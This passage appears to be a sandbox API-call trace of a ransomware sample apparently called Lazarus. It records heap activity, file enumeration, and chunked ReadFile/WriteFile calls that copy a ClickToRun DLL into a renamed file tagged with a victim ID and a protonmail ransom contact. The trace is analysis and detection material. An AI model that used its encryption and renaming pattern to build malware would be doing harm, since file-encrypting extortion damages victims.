| out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0088.397] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.397] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.397] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="API-MS~3.DLL")) returned 1 [0088.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0088.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0088.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0088.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0088.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd0) returned 0x74868 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd0) returned 0x74940 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74868 | out: hHeap=0x20000) returned 1 [0088.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x11c) returned 0x5e870 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x31cd0 | out: hHeap=0x20000) returned 1 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74940 | out: hHeap=0x20000) returned 1 [0088.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0088.398] AreFileApisANSI () returned 1 [0088.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 98 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0088.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0088.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0088.399] AreFileApisANSI () returned 1 [0088.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0088.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x4ebc8 [0088.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=98 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 98 [0088.399] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.399] GetFileType (hFile=0x348) returned 0x1 [0088.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.399] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0088.399] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0088.400] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0088.400] CloseHandle (hObject=0x348) returned 1 [0088.400] AreFileApisANSI () returned 1 [0088.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0088.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x4ebc8 [0088.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=98 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 98 [0088.400] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.400] GetFileType (hFile=0x348) returned 0x1 [0088.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.400] CloseHandle (hObject=0x348) returned 1 [0088.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0088.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0088.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0088.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0088.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0088.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0088.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0088.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0088.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0088.402] AreFileApisANSI () returned 1 [0088.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0088.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x4ebc8 [0088.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=98 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 98 [0088.402] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0)) returned 1 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.402] AreFileApisANSI () returned 1 [0088.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0088.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0088.403] GetLastError () returned 0x0 [0088.403] SetLastError (dwErrCode=0x0) [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e180 [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8e440 [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0088.403] GetLastError () returned 0x0 [0088.403] SetLastError (dwErrCode=0x0) [0088.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5f428 [0088.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0088.403] AreFileApisANSI () returned 1 [0088.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 160 [0088.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x140) returned 0x4e568 [0088.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f428, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=160 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 160 [0088.403] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.404] GetFileType (hFile=0x348) returned 0x1 [0088.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0088.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0088.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.404] AreFileApisANSI () returned 1 [0088.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0088.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x4ebc8 [0088.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=98 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 98 [0088.404] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.404] GetFileType (hFile=0x360) returned 0x1 [0088.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0088.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0088.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0088.405] GetLastError () returned 0x0 [0088.405] SetLastError (dwErrCode=0x0) [0088.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0088.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0088.405] GetLastError () returned 0x0 [0088.405] SetLastError (dwErrCode=0x0) [0088.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0088.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0088.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0088.405] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0088.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0088.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d648 [0088.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x48c98 [0088.457] GetLastError () returned 0x0 [0088.457] SetLastError (dwErrCode=0x0) [0088.458] GetLastError () returned 0x0 [0088.458] SetLastError (dwErrCode=0x0) [0088.458] GetLastError () returned 0x0 [0088.458] SetLastError (dwErrCode=0x0) [0088.458] GetLastError () returned 0x0 [0088.458] SetLastError (dwErrCode=0x0) [0088.458] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.458] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.459] GetLastError () returned 0x0 [0088.459] SetLastError (dwErrCode=0x0) [0088.459] GetLastError () returned 0x0 [0088.459] SetLastError (dwErrCode=0x0) [0088.459] GetLastError () returned 0x0 [0088.459] SetLastError (dwErrCode=0x0) [0088.460] GetLastError () returned 0x0 [0088.460] SetLastError (dwErrCode=0x0) [0088.460] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.460] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.460] GetLastError () returned 0x0 [0088.460] SetLastError (dwErrCode=0x0) [0088.460] GetLastError () returned 0x0 [0088.460] SetLastError (dwErrCode=0x0) [0088.460] GetLastError () returned 0x0 [0088.460] SetLastError (dwErrCode=0x0) [0088.460] GetLastError () returned 0x0 [0088.461] SetLastError (dwErrCode=0x0) [0088.461] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.461] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.461] GetLastError () returned 0x0 [0088.461] SetLastError (dwErrCode=0x0) [0088.461] GetLastError () returned 0x0 [0088.461] SetLastError (dwErrCode=0x0) [0088.461] GetLastError () returned 0x0 [0088.461] SetLastError 